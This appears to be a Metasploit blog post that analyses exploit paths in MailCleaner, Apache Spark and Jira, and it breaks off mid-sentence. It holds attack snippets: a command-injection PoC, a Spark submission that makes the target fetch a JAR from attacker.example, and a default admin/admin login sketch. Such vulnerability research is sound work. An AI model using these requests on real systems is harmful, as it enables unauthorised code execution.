Wei Chen, Lead Security Researcher and Exploit Developer, Metasploit
Caitlin Condon, Metasploit Community Manager
March 26, 2019
The world of exploit development is often considered arcane. Production code begets CVEs; CVEs yield proofs-of-concept (PoCs) that are shared across chatrooms and social networks. Before long, public exploits are available for testing, reverse engineering, and widespread commodity use. As open-source developers and researchers, the Metasploit Framework team is committed to building and reliant upon a strong foundation of community knowledge. As it happens, we also spend a fair bit of time shepherding vulnerabilities on their journey from incipient PoCs to stable, seasoned exploits. In the process, we learn about the never-ending nuances of vulnerability analysis and the complexities of secure software development. Spoiler: They’re both difficult, and they’re both essential.
Metasploit’s Development Diaries series sheds light on how Rapid7’s offensive research team analyzes vulnerabilities as potential candidates for inclusion in Metasploit Framework—in other words, how a vulnerability makes it through rigorous open-source committee to become a full-fledged Metasploit module. We also delve into some of the biases and development practices that influence the infosec community’s decisions on which exploits to pursue, which vulnerabilities to patch, and when workarounds or trade-offs are deemed a reasonable path for vendors to traverse.
The inaugural edition of this quarterly series will examine a bona fide vulnerability, an overpowered feature that was ripe for abuse, and a "foreverday" that exploits intended functionality to gain remote code execution on a target system.
Researcher and Metasploit contributor Mehmet Ince submitted an exploit module for “mailcleaner_exec” to Metasploit in December 2018. The module was based on his own initial analysis of a post-authentication RCE in the Logs_StartTrace SOAP web request for MailCleaner. MailCleaner is an anti-spam and antivirus software that functions as a filtering SMTP gateway. It comes in two editions: Enterprise and Community. The codebase for the open-source community edition can be found on GitHub.
At the time of analysis (Jan. 10, 2019), the community version "Jessie" (2018092601) was vulnerable. These days, the easiest way to audit the vulnerable codebase is to check out the source on GitHub:
```
$ git clone https://github.com/MailCleaner/MailCleaner.git
$ cd MailCleaner
$ git checkout a0281293c31b534cc7db4f798346722c321d078e
$ git checkout -b CVE_2018_20323
```
Our analysis starts from the attack surface and moves through every major component in the code path until we reach the vulnerable code itself. The vulnerability was publicly assigned CVE-2018-20323.
Since a Metasploit module was submitted to GitHub, our analysis began with a PoC:
```ruby
send_request_cgi({
  'method'    => 'POST',
  'uri'       => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
  'cookie'    => cookie,
  'vars_post' => {
    'search' => rand_text_alpha(5),
    'domain' => cmd,
    'submit' => 1
  }
})
```
Here, `cmd` stands for command, which means we can inject a system command via the `domain` parameter of an HTTP POST request. The request also tells us we're sending the malicious input to the path `/admin/managetracing/search/search`.
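To make the injection concrete, here is a minimal sketch of the request body the module sends. This is a stdlib-only Python stand-in, not the module's Ruby; the search string and injected command are hypothetical placeholder values.

```python
from urllib.parse import urlencode

# Hypothetical attacker-controlled command; it lands in the 'domain'
# parameter of the POST to /admin/managetracing/search/search.
cmd = "whoami"

body = urlencode({
    "search": "aaaaa",  # arbitrary search string
    "domain": cmd,      # the injection point
    "submit": 1,
})

print(body)  # search=aaaaa&domain=whoami&submit=1
```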
MailCleaner is written as a PHP application using the Zend Framework (based on the model-view-controller architecture). Typically, the URL path hints at the name of the controller; in this case, it's `managetracing`, so our search begins there.
A quick search on GitHub tells us the `managetracing` controller is handled by the `ManagetracingController` class in `www/guis/admin/application/controllers/ManagetracingController.php`. A controller may contain multiple actions, which are relatively easy to identify because they share the same naming convention—for instance, `public function somethingAction()`.
In the case of `ManagetracingController`, it supports these actions: `index`, `search`, `logextract`, and `downloadtrace`. Since our PoC points to `search` in the URL, that's the action we want to look at.
In the PoC, the `domain` parameter is the vehicle for injecting malicious commands. The search parameters get loaded rather early in `searchAction`, specifically in the last line of this code block:
```php
public function searchAction() {
    $layout = Zend_Layout::getMvcInstance();
    $view = $layout->getView();
    $layout->disableLayout();
    $view->addScriptPath(Zend_Registry::get('ajax_script_path'));
    $view->thisurl = Zend_Controller_Action_HelperBroker::getStaticHelper('url')->simple('index', 'managecontentquarantine', NULL, array());
    $request = $this->getRequest();

    $loading = 1;
    if (! $request->getParam('load')) {
        sleep(1);
        $loading = 0;
    }
    $view->loading = $loading;

    $view->params = $this->getSearchParams();
```
Looking at the `getSearchParams` function (also found in `ManagetracingController.php`), we can tell this is more of a normalizer. The first thing it does is convert an array of supported parameters into a hash:
```php
foreach (array('search', 'domain', 'sender', 'mpp', 'page', 'sort', 'fd', 'fm', 'td', 'tm', 'submit', 'cancel', 'hiderejected') as $param) {
    $params[$param] = '';
    if ($request->getParam($param)) {
        $params[$param] = $request->getParam($param);
    }
}
```
If we stay focused on the `domain` parameter the PoC uses, we see that it is concatenated to a string and saved as the `regexp` key in the `$params` hash toward the end of the function:
```php
if (isset($params['search']) && isset($params['domain'])) {
    $params['regexp'] = $params['search'].'.*@'.$params['domain'];
}
```
This detail is important because the `regexp` value is what later gets us remote code execution.
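A quick sketch of that concatenation (Python standing in for the PHP, with hypothetical inputs) shows why it matters: whatever we pass as `domain` is appended verbatim, quotes and all.

```python
# Python stand-in for: $params['regexp'] = $params['search'].'.*@'.$params['domain'];
def build_regexp(search: str, domain: str) -> str:
    return search + ".*@" + domain

# A benign request:
benign = build_regexp("alice", "example.com")
print(benign)  # alice.*@example.com

# A malicious 'domain' travels through unchanged, single quote and all:
evil = build_regexp("aaaaa", "x'; id; '")
print(evil)  # aaaaa.*@x'; id; '
```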
Back in the `searchAction` function, we then trigger this code path:
```php
$element = new Default_Model_MessageTrace();
// ... code snipped ...
if ($request->getParam('domain') != "") {
    $trace_id = $element->startFetchAll($params);
    $session->trace_id = $trace_id;
}
```
The `startFetchAll` call is interesting to us because it handles our normalized parameters. We can tell `startFetchAll` comes from the `Default_Model_MessageTrace` class found in `www/guis/admin/application/models/MessageTrace.php`, so naturally that's where we investigate first:
```php
public function startFetchAll($params) {
    return $this->getMapper()->startFetchAll($params);
}
```
It turns out this is just a wrapper around another `startFetchAll` function, which is also quick to find if you have a decent code editor to guide you:
```php
public function startFetchAll($params) {
    $trace_id = 0;
    $slave = new Default_Model_Slave();
    $slaves = $slave->fetchAll();
    foreach ($slaves as $s) {
        $res = $s->sendSoapRequest('Logs_StartTrace', $params);
        if (isset($res['trace_id'])) {
            $trace_id = $res['trace_id'];
            $params['trace_id'] = $trace_id;
        } else {
            continue;
        }
    }
    return $trace_id;
}
```
The above code tells us our parameters get sent via a SOAP request, specifically to the `Logs_StartTrace` handler. A quick `grep` for that in the codebase tells us that all of the SOAP API lives in the `/www/soap` directory, and we come up with these results:
```
$ grep -R Logs_StartTrace *
application/MCSoap/Logs.php:    static public function Logs_StartTrace($params) {
application/SoapInterface.php:  static public function Logs_StartTrace($params) {
application/SoapInterface.php:      return MCSoap_Logs::Logs_StartTrace($params);
```
When auditing, it is always a good idea to look at the interface first to make sure you're following the flow correctly. The SOAP interface tells us to go look at the static function in `MCSoap_Logs`:
```php
static public function Logs_StartTrace($params) {
    return MCSoap_Logs::Logs_StartTrace($params);
}
```
Our next step, then, is to look at the static `Logs_StartTrace` function. The code looks a bit more complicated, but pay close attention to the `regexp` parameter: it gets absorbed into a `$cmd` variable, and that variable is later executed as a system command. See the second line from the bottom, before the return statement:
```php
static public function Logs_StartTrace($params) {
    $trace_id = 0;
    require_once('MailCleaner/Config.php');
    $mcconfig = MailCleaner_Config::getInstance();

    if (!isset($params['regexp']) ||
        !$params['datefrom'] || !preg_match('/^\d{8}$/', $params['datefrom']) ||
        !$params['dateto'] || !preg_match('/^\d{8}$/', $params['dateto'])) {
        return array('trace_id' => $trace_id);
    }

    $cmd = $mcconfig->getOption('SRCDIR')."/bin/search_log.pl ".$params['datefrom']." ".$params['dateto']." '".$params['regexp']."'";
    if (isset($params['filter']) && $params['filter'] != '') {
        $cmd .= " '".$params['filter']."'";
    }
    if (isset($params['hiderejected']) && $params['hiderejected']) {
        $cmd .= ' -R ';
    }

    if (isset($params['trace_id']) && $params['trace_id']) {
        $trace_id = $params['trace_id'];
    } else {
        $trace_id = md5(uniqid(mt_rand(), true));
    }
    $cmd .= " -B ".$trace_id;
    $cmd .= "> ".$mcconfig->getOption('VARDIR')."/run/mailcleaner/log_search/".$trace_id." &";

    $res = `$cmd`;

    return array('trace_id' => $trace_id, 'cmd' => $cmd);
}
```
The code also tells us that `regexp` isn't the only parameter that can be used to inject malicious input. The `filter` parameter (the normalized version of the `sender` parameter) can trigger the same problem, but it's patched.
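To see the breakout itself, here is a sketch of how the `regexp` value lands inside the single-quoted argument of `$cmd`. This is Python standing in for the PHP string building, and the `SRCDIR` value and injected command are hypothetical; a single quote inside `domain` terminates the quoting, and the shell parses whatever follows.

```python
# Python stand-in for the command construction in Logs_StartTrace.
# SRCDIR is a hypothetical value; MailCleaner reads it from its config.
SRCDIR = "/usr/mailcleaner"

def build_cmd(datefrom: str, dateto: str, regexp: str) -> str:
    # Mirrors: $cmd = SRCDIR."/bin/search_log.pl ".datefrom." ".dateto." '".regexp."'";
    return f"{SRCDIR}/bin/search_log.pl {datefrom} {dateto} '{regexp}'"

# regexp = search + '.*@' + domain; the single quote in 'domain'
# closes the quoted argument, and 'id' runs as a shell command.
regexp = "aaaaa.*@x'; id #"
cmd = build_cmd("20190101", "20190110", regexp)
print(cmd)
# /usr/mailcleaner/bin/search_log.pl 20190101 20190110 'aaaaa.*@x'; id #'
```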
Now that we have reached the code that executes the malicious input, we can conclude our root-cause analysis of the MailCleaner command injection vulnerability.
A patch applying PHP's `escapeshellarg` to sanitize the inputs was committed to GitHub as c2bc42c3df013dbc5b419ae746ea834cf7542399. Although this works fine on Linux, `escapeshellarg` has a history of Windows-specific security problems that allow bypasses. This means that even after the patch, the SOAP API could still pose a threat to Windows users running older versions of PHP.
It is also interesting that instead of submitting the patch as a pull request (as one might expect and as is normal for this project), the fix in this case was committed directly to master. It seems likely that this tactic was an attempt to slip the patch in under the radar before malicious attackers had a chance to spot the flaw in a pull request and exploit end users. Unfortunately, it also means that experts in the codebase may not have had enough opportunity to audit the fix for completeness.
The vulnerability here requires a password to achieve successful command injection. As a community, we tend to have a soft spot for pre-auth shells; a post-auth shell isn't as immediately exciting, so when we see that a password is required, our enthusiasm drops a notch. In our experience, though, a password requirement often masks an underestimated exploitable condition: Many web applications rely on system functions such as executing commands and reading or writing files. This dependency makes weak passwords arguably the worst vulnerabilities in a network, since cracking passwords doesn't take much skill or sophistication. Strong password policies and enforcement mechanisms can stop many post-auth zero-days from succeeding. This vulnerability highlights our biases and underscores the need for robust password policies.
It’s pretty rare for 0day to drop in the public Metasploit pull request queue, so that alone makes this vulnerability worth analysis and module development. If we’d seen a regular old CVE description instead of a pull request sans CVE reference, we might have needed some more gut-instinct approximations on application popularity, commonality across industry verticals, or the types of users who typically have access. Ultimately, the exploit is too easy to ignore: The vulnerability is worth both patching and exploitation.
The details of the vulnerability, as described in the vulnerability analysis section above, are essential for creating a module. If you want to craft a working exploit, there’s no replacement for the knowledge gained in assessing the application. That said, one of the major benefits Metasploit Framework offers exploit devs and researchers is access to reusable components honed through years of real-world use. To turn the above PoC into a Metasploit module only requires fleshing out a module template (available here, along with related information) and using the handy HttpClient mixin (learn how from this usage doc, including examples). The finished module can be found here.
In November 2018, Metasploit committer and community member Green-m submitted a module for “spark_unauth_rce”. Apache Spark is an open-source cluster-computing framework that was originally developed by UC Berkeley’s AMPLab and is maintained by the Apache Software Foundation. It is primarily written in Scala and is designed to be a fast, unified analytics engine for large-scale data. It is common in enterprise environments, which always catches our attention.
Researcher Fengwei Zhang of Alibaba’s cloud security team discovered that the REST API’s `CreateSubmissionRequest` can be abused in standalone mode to let users submit malicious code that results in remote code execution. According to Apache Spark's security issue list, this vulnerability was assigned CVE-2018-11770.
According to the Apache Software Foundation, versions from 1.3.0 onward running a standalone master with the REST API enabled are vulnerable, as are versions running a Mesos master with cluster mode enabled.
For testing purposes, the vulnerable version of Apache Spark can be installed as a Docker container by performing the following:
```
$ git clone https://github.com/vulhub/vulhub.git
$ cd vulhub/spark/unacc
$ docker-compose up -d
```
There’s a community-written walkthrough of manual installation for the Windows version here. The release notes for Apache Spark indicate that the vulnerability was patched in version 2.4.0, and you can see the corresponding Jira ticket here. The pull request can be found at #22071, where we learn the following specifics:

- `spark.master.rest.enabled=true` (in the config file)

Apache Spark is well-documented—from release notes to Jira tickets and pull requests—so it doesn't take long to identify the code responsible for the insecure submission. Based on the patch, the culprit is the `StandaloneRestServer` class.
The `StandaloneRestServer` class actually extends the abstract `RestSubmissionServer` class, so we need to look at that first. The beginning of the abstract class tells us how the URLs are mapped:
```scala
protected val baseContext = s"/${RestSubmissionServer.PROTOCOL_VERSION}/submissions"
protected lazy val contextToServlet = Map[String, RestServlet](
  s"$baseContext/create/*" -> submitRequestServlet,
  s"$baseContext/kill/*" -> killRequestServlet,
  s"$baseContext/status/*" -> statusRequestServlet,
  "/*" -> new ErrorServlet // default handler
)
```
The above tells us that a request in the following format is routed to the `submitRequestServlet` class:

```
/v1/submissions/create
```
Inside the `submitRequestServlet` class, there is a `doPost` function:
```scala
protected override def doPost(
    requestServlet: HttpServletRequest,
    responseServlet: HttpServletResponse): Unit = {
  val responseMessage =
    try {
      val requestMessageJson = Source.fromInputStream(requestServlet.getInputStream).mkString
      val requestMessage = SubmitRestProtocolMessage.fromJson(requestMessageJson)
      // The response should have already been validated on the client.
      // In case this is not true, validate it ourselves to avoid potential NPEs.
      requestMessage.validate()
      handleSubmit(requestMessageJson, requestMessage, responseServlet)
    } catch {
      // The client failed to provide a valid JSON, so this is not our fault
      case e @ (_: JsonProcessingException | _: SubmitRestProtocolException) =>
        responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST)
        handleError("Malformed request: " + formatException(e))
    }
  sendResponse(responseMessage, responseServlet)
}
```
This retrieves data from the stream, normalizes it, and passes it to a `handleSubmit` function. Anyone using `RestSubmissionServer` must implement `handleSubmit`.
Now that we have a basic understanding of the abstract class, we can look at the subclasses. `StandaloneRestServer` is one of the classes that extends `RestSubmissionServer`, and it fits the description of the problem:
```scala
private[deploy] class StandaloneRestServer(
    host: String,
    requestedPort: Int,
    masterConf: SparkConf,
    masterEndpoint: RpcEndpointRef,
    masterUrl: String)
  extends RestSubmissionServer(host, requestedPort, masterConf)
```
It's also easy to identify what we should be looking at because of this line in the code:
```scala
protected override val submitRequestServlet =
  new StandaloneSubmitRequestServlet(masterEndpoint, masterUrl, masterConf)
```
In `StandaloneSubmitRequestServlet`, we find the `handleSubmit` code we need:
```scala
protected override def handleSubmit(
    requestMessageJson: String,
    requestMessage: SubmitRestProtocolMessage,
    responseServlet: HttpServletResponse): SubmitRestProtocolResponse = {
  requestMessage match {
    case submitRequest: CreateSubmissionRequest =>
      val driverDescription = buildDriverDescription(submitRequest)
      val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](
        DeployMessages.RequestSubmitDriver(driverDescription))
      val submitResponse = new CreateSubmissionResponse
      submitResponse.serverSparkVersion = sparkVersion
      submitResponse.message = response.message
      submitResponse.success = response.success
      submitResponse.submissionId = response.driverId.orNull
      val unknownFields = findUnknownFields(requestMessageJson, requestMessage)
      if (unknownFields.nonEmpty) {
        // If there are fields that the server does not know about, warn the client
        submitResponse.unknownFields = unknownFields
      }
      submitResponse
    case unexpected =>
      responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST)
      handleError(s"Received message of unexpected type ${unexpected.messageType}.")
  }
}
```
Looking at the code, the `buildDriverDescription` function seems interesting. To start with, it reveals what the `appResource` parameter means. The function is large, but it begins this way:
```scala
val appResource = Option(request.appResource).getOrElse {
  throw new SubmitRestMissingFieldException("Application jar is missing.")
}
```
Toward the end of the code, it is passed into `DriverDescription`:
```scala
new DriverDescription(appResource, actualDriverMemory, actualDriverCores, actualSuperviseDriver, command)
```
When we look at the `DriverDescription` class, we understand `appResource`'s purpose: it is a URL to a JAR file:
```scala
private[deploy] case class DriverDescription(
    jarUrl: String,
    mem: Int,
    cores: Int,
    supervise: Boolean,
    command: Command)
```
This means that when we create a submission request, we can point the server at a remote JAR, which dictates the attack vector.
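Public proofs-of-concept exercise this with a JSON body along the lines of the following sketch. The field names follow the REST submission protocol the server parses above, but the attacker URL, class name, target host, and Spark version here are hypothetical placeholders:

```python
import json

# Hypothetical attacker-controlled values; 'appResource' is the
# remote JAR the standalone master will be told to fetch and run.
submission = {
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.3.1",
    "appResource": "http://attacker.example/exploit.jar",  # remote JAR URL
    "mainClass": "Exploit",
    "appArgs": [],
    "environmentVariables": {"SPARK_ENV_LOADED": "1"},
    "sparkProperties": {
        "spark.master": "spark://target.example:6066",
        "spark.app.name": "Exploit",
        "spark.submit.deployMode": "cluster",
        "spark.driver.supervise": "false",
        "spark.jars": "http://attacker.example/exploit.jar",
    },
}

# This body would be POSTed to http://target.example:6066/v1/submissions/create
body = json.dumps(submission, indent=2)
print(body)
```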
The `buildDriverDescription` function also contains clues about how the JAR is launched:
```scala
val command = new Command(
  "org.apache.spark.deploy.worker.DriverWrapper",
  Seq("{{WORKER_URL}}", "{{USER_JAR}}", mainClass) ++ appArgs,
  environmentVariables, extraClassPath, extraLibraryPath, javaOpts)
```
The `Command` class is defined as follows:
```scala
private[spark] case class Command(
    mainClass: String,
    arguments: Seq[String],
    environment: Map[String, String],
    classPathEntries: Seq[String],
    libraryPathEntries: Seq[String],
    javaOpts: Seq[String]) {
}
```
We see that the first argument is the main class, in this case `org.apache.spark.deploy.worker.DriverWrapper`, which is meant to invoke our `main` method:
```scala
val clazz = Utils.classForName(mainClass)
val mainMethod = clazz.getMethod("main", classOf[Array[String]])
mainMethod.invoke(null, extraArgs.toArray[String])
```
After the driver description is crafted, it is sent to another component called `RequestSubmitDriver`:
```scala
val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](
  DeployMessages.RequestSubmitDriver(driverDescription))
```
`RequestSubmitDriver` can be found in the `receiveAndReply` function in `Master.scala`:
```scala
case RequestSubmitDriver(description) =>
  if (state != RecoveryState.ALIVE) {
    val msg = s"${Utils.BACKUP_STANDALONE_MASTER_PREFIX}: $state. " +
      "Can only accept driver submissions in ALIVE state."
    context.reply(SubmitDriverResponse(self, false, None, msg))
  } else {
    logInfo("Driver submitted " + description.command.mainClass)
    val driver = createDriver(description)
    persistenceEngine.addDriver(driver)
    waitingDrivers += driver
    drivers.add(driver)
    schedule()
```
In the `else` block, we see that our driver is added to a collection of waiting drivers before the code calls `schedule()`:
```scala
private def schedule(): Unit = {
  if (state != RecoveryState.ALIVE) {
    return
  }
  val shuffledAliveWorkers = Random.shuffle(workers.toSeq.filter(_.state == WorkerState.ALIVE))
  val numWorkersAlive = shuffledAliveWorkers.size
  var curPos = 0
  for (driver <- waitingDrivers.toList) {
    var launched = false
    var numWorkersVisited = 0
    while (numWorkersVisited < numWorkersAlive && !launched) {
      val worker = shuffledAliveWorkers(curPos)
      numWorkersVisited += 1
      if (worker.memoryFree >= driver.desc.mem && worker.coresFree >= driver.desc.cores) {
        launchDriver(worker, driver)
        waitingDrivers -= driver
        launched = true
      }
      curPos = (curPos + 1) % numWorkersAlive
    }
  }
  startExecutorsOnWorkers()
}
```
Notice the `launchDriver` function. Looking further:
```scala
private def launchDriver(worker: WorkerInfo, driver: DriverInfo) {
  logInfo("Launching driver " + driver.id + " on worker " + worker.id)
  worker.addDriver(driver)
  driver.worker = Some(worker)
  worker.endpoint.send(LaunchDriver(driver.id, driver.desc))
  driver.state = DriverState.RUNNING
}
```
The code relies on the `Worker` class to launch the driver. We can find this in `Worker.scala`:
```scala
case LaunchDriver(driverId, driverDesc) =>
  logInfo(s"Asked to launch driver $driverId")
  val driver = new DriverRunner(
    conf,
    driverId,
    workDir,
    sparkHome,
    driverDesc.copy(command = Worker.maybeUpdateSSLSettings(driverDesc.command, conf)),
    self,
    workerUri,
    securityMgr)
  drivers(driverId) = driver
  driver.start()
```
If you’re wondering what `driver.start()` does, you’re not alone. Since `driver` is a `DriverRunner` instance, that's where we find the code. The purpose of `DriverRunner` is self-explanatory, and the `Worker` class tells us we should be looking at its `start()` function. There is a lot of code for process setup and handling, which we’ll skip to get to the point: tracing from `start()` leads through `prepareAndRunDriver()` and `runDriver()` to `runCommandWithRetry()`, which executes our code using `ProcessBuilder`:
```scala
private[worker] def runCommandWithRetry(
    command: ProcessBuilderLike,
    initialize: Process => Unit,
    supervise: Boolean): Int = {
  // ... code snipped ...
  synchronized {
    if (killed) { return exitCode }
    process = Some(command.start())
    initialize(process.get)
  }
```
Now that we have found the code that executes our payload, we should have a basic understanding of what the execution flow looks like.
Apache indicated the vulnerability was patched in version 2.4.0 as of Aug. 14, 2018, but the fix it implemented was to “disable the REST API by setting spark.master.rest.enabled to false” and/or to “ensure that all network access to the REST API (port 6066 by default) is restricted to hosts that are trusted to submit jobs.” The fix, in other words, smells a whole lot more like a workaround than a true patch. We don’t point this out because the fix was unreasonable or ineffective—on the contrary, software producers often call functional workarounds patches when true patching isn't a realistic or cost-effective option.
We would be remiss if we failed to mention that Apache Spark has quite a few beneficial software development habits that Metasploit appreciates and others may want to consider implementing. Throughout the review process, we noticed that PR numbers were attached to tickets whenever possible, and PR titles were properly labeled with Jira ticket numbers. Developers take the time to write detailed descriptions for their pull requests, and they devote genuine effort to ensuring reviewers understand them. This is rare in our experience. We also admired the dedication to thorough code review, well-written release notes, useful references, and comments evident throughout the codebase.
Apache Spark’s `CreateSubmissionRequest` REST API is, by definition, a feature, not a bug. However, it isn’t documented to the usual standards of the Apache Spark project, and on top of that, it’s enabled by default. Combined, these qualities produced an overpowered feature that was ripe for reliable abuse by attackers.
There wasn’t a clear consensus among the Metasploit research team on how immediately useful exploitation would be in this case. With that said, unauthenticated RCE is usually too compelling to pass up without a good reason—like many offensive practitioners, we wouldn’t say no if we saw an exploit opportunity in a dark corner of a client’s tech stack.
The Metasploit module relies on two mixins to exploit the vulnerability: `HttpClient` and `HttpServer`. These two mixins can prove tricky to use together, since the attacker is usually just one side or the other. In this case, the attacker is both client and server—you can find documentation on how to use them both in cases like this here.
The `HttpServer` mixin is used to host the payload. `HttpClient` sends a submission request to Apache Spark's REST API server, which instructs it to download the payload. The module is highly reliable, but both offensive and defensive practitioners will want to note that it can leave quite a few artifacts on the target system—most obviously, the malicious driver visible in the master GUI.
The Metasploit style conventions suggest that modules use randomness whenever they are able—i.e., randomizing the payload name, path, padding, and so on. In this case, however, randomness actually makes the payload stand out a lot on the master GUI list, making it an exception to the randomness rule.
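The trade-off can be sketched briefly. The helper below is a local Python stand-in for the Framework's `rand_text_alpha`, and the "plausible" driver name is a hypothetical example, not a value from the module:

```python
import random
import string

# Local stand-in for Metasploit's rand_text_alpha helper.
def rand_text_alpha(n: int) -> str:
    return "".join(random.choice(string.ascii_letters) for _ in range(n))

# A random name is conspicuous in the Spark master GUI next to real
# job names, which is why this module is an exception to the usual
# randomize-everything convention.
random_name = rand_text_alpha(10)   # conspicuous gibberish
plausible_name = "spark-etl-job"    # hypothetical name that blends in

print(random_name, plausible_name)
```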
In February 2018, Metasploit contributor Alex Gonzalez submitted an authenticated code execution exploit module, “jira_plugin_upload”, to the Framework. Jira is a popular Java application used for bug tracking and agile project management. It is developed by Atlassian and boasts a global customer base that includes a large number of high-profile corporate and government entities.
While neither the module description nor the documentation goes into a detailed analysis of the vulnerability, it is clear that the Universal Plugin Manager (UPM) component is the root cause. The upload feature in the UPM would allow a Jira user to upload a malicious plugin (add-on) and achieve remote code execution. The implication, which we later confirmed, was that authentication is required to achieve this.
During our analysis, we tested with Jira 7.8.0. However, since the main dependency is the implementation of Atlassian’s UPM framework, all versions of Jira should be vulnerable—making this a classic “foreverday” vulnerability. You can find Windows installation instructions here and Linux/Mac installation information here. After installation, create a plugin.
We used tools from the Sysinternals Suite for the initial analysis of this vulnerability.
After installing Jira, we learned that the default port is 2990 (HTTP), and the TCPView utility tells us the listener is a `java.exe` process.
Process Monitor is used to watch the operations that occur when an exploit is fired against `java.exe`. We know the exploit attempts to upload a Metasploit Java payload to Jira, so we should expect some activity related to a `Payload.class` file. On Windows, the payload gets uploaded to the following location:
C:\Users\TestUser\myPlugin\target\container\tomcat8x\cargo-jira-home\temp\~spawn6080520409872505521.tmp.dir\metasploit\Payload.class
Most significantly, Process Monitor also reveals the location of the JAR file for UPM:
C:\Users\TestUser\myPlugin\target\container\tomcat8x\cargo-jira-home\webapps\jira\WEB-INF\atlassian-bundled-plugins\atlassian-universal-plugin-manager-plugin-2.22.9.jar
To take a closer look at the `atlassian-universal-plugin-manager-plugin` JAR file, a Java decompiler is needed. There are many out in the wider internet world; in this case, we picked JD-GUI for the task. The JAR includes quite a few interesting classes. The one that stands out most for our purposes is the `FileUploadBase` class (in `org.apache.commons.fileupload`) because of the `Streams.copy` statement in the `parseRequest` function (abbreviated):
```java
fileName = ((FileUploadBase.FileItemIteratorImpl.FileItemStreamImpl)item).name;
FileItem fileItem = fac.createItem(item.getFieldName(), item.getContentType(), item.isFormField(), fileName);
items.add(fileItem);
try {
    Streams.copy(item.openStream(), fileItem.getOutputStream(), true);
}
```
Typically, to confirm we're on the right path, we would need a log file or a debugger. The latter option is usually much better, as it allows us to set a breakpoint to let us know we’re looking at the right thing. Fortunately, Jira supports remote debugging in a rather convenient way—Atlassian’s documentation describes how to do this with either IntelliJ IDEA or Eclipse.
We set a Java method breakpoint in IntelliJ on the `parseRequest` method in the `org.apache.commons.fileupload.FileUploadBase` class.
Firing the exploit again hits our breakpoint, which confirms our assumptions. The `Streams.copy` statement copies our payload to `C:\Users\TestUser\myPlugin\target\container\tomcat8x\cargo-jira-home\temp\plug_[token]_[payloadname].jar`.
The thread dump from IntelliJ also shows the code path that reaches the `FileUploadBase` class (output is modified to fit the screen):
```
org.apache.commons.fileupload.util.Streams.copy
org.apache.commons.fileupload.FileUploadBase.parseRequest
com.atlassian.plugins.rest.common.multipart.fileupload.CommonsFileUploadMultipartHandler.getForm
com.atlassian.plugins.rest.common.multipart.fileupload.CommonsFileUploadMultipartHandler.getForm(CommonsFileUploadMultipartHandler.java:66)
com.atlassian.plugins.rest.common.multipart.fileupload.CommonsFileUploadMultipartHandler.getFilePart(CommonsFileUploadMultipartHandler.java:32)
com.atlassian.upm.core.rest.resources.PluginCollectionResource.installFromFileSystem(PluginCollectionResource.java:254)
```
The last line of the dump tells us that `com.atlassian.upm.core.rest.resources.PluginCollectionResource.installFromFileSystem` handles the installation at the REST API level, so that's where we investigate.
The `installFromFileSystem` function in `PluginCollectionResource` tells us a lot. First off, here is the decompiled code:
```java
@POST
@Consumes({"multipart/form-data", "multipart/mixed"})
@XsrfProtectionExcluded
public Response installFromFileSystem(@Context MultipartHandler multipartHandler,
        @Context HttpServletRequest request,
        @DefaultValue("jar") @QueryParam("type") String type,
        @QueryParam("token") String token) {
    this.permissionEnforcer.enforcePermission(Permission.MANAGE_IN_PROCESS_PLUGIN_INSTALL_FROM_FILE);
    UpmResources.validateToken(token, this.userManager.getRemoteUserKey(), "text/html", this.tokenManager, this.representationFactory);
    try {
        FilePart filePart = multipartHandler.getFilePart(request, "plugin");
        File plugin = copyFilePartToTemporaryFile(filePart, type);
        AsyncTask task = new InstallFromFileTask(Option.option(filePart.getName()), plugin,
            this.pluginInstaller, this.selfUpdateController, this.uriBuilder, this.appManager, this.i18nResolver);
        AsyncTaskInfo taskInfo = this.taskManager.executeAsynchronousTask(task);
        Response response = this.taskRepresentationFactory.createLegacyAsyncTaskRepresentation(taskInfo).toNewlyCreatedResponse(this.uriBuilder);
        String acceptHeader = request.getHeader("Accept");
        if ((acceptHeader != null) && ((acceptHeader.contains("text/html")) || (acceptHeader.contains("*")))) {
            return Response.fromResponse(response).type("text/html").build();
        }
        return response;
    } catch (IOException e) {
        return Response.serverError().entity(this.representationFactory.createErrorRepresentation(e.getMessage())).type("application/vnd.atl.plugins.error+json").build();
    }
}
```
The first things you’re likely to notice are the PluginCollectionResource method annotations at the beginning, described in the table below:
@POST | An HTTP POST request is needed for this function to kick in.
@Consumes | Content types such as multipart/form-data and multipart/mixed are needed in the POST request.
@XsrfProtectionExcluded | No XSRF protection for this endpoint, even though XSRF protection is enabled by default in the Atlassian REST 3.0 API.
From the arguments, we also know the function needs a type, with a JAR file expected by default, and a token, which is obtained after login.
The very first thing the function does is enforce the MANAGE_IN_PROCESS_PLUGIN_INSTALL_FROM_FILE permission. This, plus token validation, means the API requires authentication to obtain this privilege, and during our analysis we realized this permission usually or always requires admin-level access. It is worth mentioning that the default username and password combination for Jira is admin/admin, which invites compromise. However, to give Atlassian credit, a password policy feature (as well as a CAPTCHA) does exist; it's just disabled by default. When enabled, this password policy would significantly mitigate the attack vector.
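As a quick illustration of why the default credentials matter, the form-based login Jira exposes can be sketched in plain Ruby. The endpoint path and the empty os_destination/atl_token values here are placeholders; os_username and os_password are the parameter names Jira's Seraph-based login form uses:

```ruby
require 'uri'

# Hypothetical target; Jira's form login endpoint is typically /login.jsp.
login_url = 'http://jira.example.com/login.jsp'

# Seraph-style form login parameters, using the out-of-the-box
# admin/admin combination discussed above.
params = {
  'os_username'    => 'admin',
  'os_password'    => 'admin',
  'os_destination' => '',
  'login'          => 'Log In'
}

# URL-encode the form body that would be POSTed to login_url.
body = URI.encode_www_form(params)
puts body
```

A real module would send this body with a Content-Type of application/x-www-form-urlencoded and keep the resulting session cookie for the requests that follow.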
The rest of the code uses FileUploadBase to do the following:

Perform the upload:
FilePart filePart = multipartHandler.getFilePart(request, "plugin");

Save the JAR file:
File plugin = copyFilePartToTemporaryFile(filePart, type);

Install it:
AsyncTask task = new InstallFromFileTask(Option.option(filePart.getName()), plugin, this.pluginInstaller, this.selfUpdateController, this.uriBuilder, this.appManager, this.i18nResolver);
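To make the upload step concrete, here is a minimal sketch in plain Ruby of the multipart/form-data body the endpoint's parser expects. The part name must be "plugin" to match getFilePart(request, "plugin") above; the boundary, filename, and JAR bytes are arbitrary placeholders:

```ruby
# Build a minimal multipart/form-data body by hand. The part name must be
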